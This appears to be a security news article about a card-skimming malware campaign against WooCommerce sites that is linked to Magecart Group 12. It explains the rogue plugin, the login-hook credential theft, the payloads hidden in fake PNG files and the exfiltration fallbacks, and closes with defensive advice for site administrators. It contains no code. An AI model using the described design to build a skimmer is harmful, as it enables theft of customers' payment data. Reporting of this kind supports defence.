Sophisticated Malware Campaign Targets WooCommerce Sites, Stealing Credit Card Data
A sophisticated malware campaign has emerged, specifically targeting WordPress e-commerce websites that utilize the WooCommerce plugin for processing customer transactions. Discovered in August 2025, this threat showcases advanced evasion techniques coupled with multi-layered credit card harvesting mechanisms designed to circumvent traditional security detection methods.
Malware Deployment and Operation
The malware infiltrates systems as a rogue WordPress plugin, incorporating custom encryption protocols and disguising malicious payloads within fake image files. It establishes a persistent backdoor, allowing attackers to deploy additional code as needed. Installation necessitates administrator-level access, typically obtained through compromised credentials or vulnerabilities in existing plugins.
Once activated, the malware conceals itself from the WordPress plugin directory, reducing the likelihood of detection. It sets tracking cookies and logs administrator activities across the compromised site. Wordfence analysts identified and cataloged this malware after receiving a comprehensive sample on August 21, 2025. Subsequently, four detection signatures were developed and released to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025. Free users received these signatures following the standard 30-day delay.
Advanced Persistence and Command-and-Control Infrastructure
The malware ensures its resilience through multiple redundancy layers. It intercepts WordPress user credentials during login by utilizing the `wp_authenticate_user` filter and `wp_login` action hooks, exfiltrating this data to attacker-controlled servers.
The payload injection mechanism operates via fake PNG image files containing reversed and encoded JavaScript. These are deployed across three distinct files:
1. A custom payload updated via an AJAX backdoor.
2. A dynamic payload refreshed daily.
3. A fallback static copy.
The JavaScript skimmer activates on WooCommerce checkout pages with a three-second delay to avoid form conflicts. It attaches event listeners to capture card numbers, expiry dates, and CVV values, subsequently transmitting this information back through AJAX POST requests.
The PHP exfiltration component employs multiple fallback mechanisms—native cURL, `file_get_contents`, system shell curl, and email delivery—ensuring data reaches attackers across diverse server environments.
Connection to Magecart Group 12
Analysis links the malware to Magecart Group 12, supported by the SMILODON identifier found in command-and-control server URLs and coding patterns matching previous activities of this threat actor. This connection underscores the persistent threat landscape for WordPress e-commerce platforms and highlights the critical importance of maintaining updated security infrastructure and monitoring systems.
Implications for E-Commerce Security
This campaign represents a significant risk to online merchants and their customers, as the malware systematically captures and exfiltrates sensitive payment data. The advanced evasion techniques employed make detection and mitigation challenging, emphasizing the need for robust security measures.
Recommendations for Website Administrators
To safeguard against such sophisticated threats, website administrators are advised to:
1. Regularly Update Plugins and Themes: Ensure all WordPress plugins and themes are up-to-date to mitigate vulnerabilities.
2. Implement Strong Authentication Measures: Utilize multi-factor authentication (MFA) to protect administrative accounts.
3. Conduct Regular Security Audits: Perform periodic security assessments to identify and address potential vulnerabilities.
4. Monitor for Unusual Activity: Keep an eye on website logs and user activities for signs of unauthorized access or modifications.
5. Employ Web Application Firewalls (WAF): Use WAFs to filter and monitor HTTP traffic between a web application and the Internet.
By implementing these measures, administrators can enhance the security posture of their e-commerce platforms and protect sensitive customer information from malicious actors.
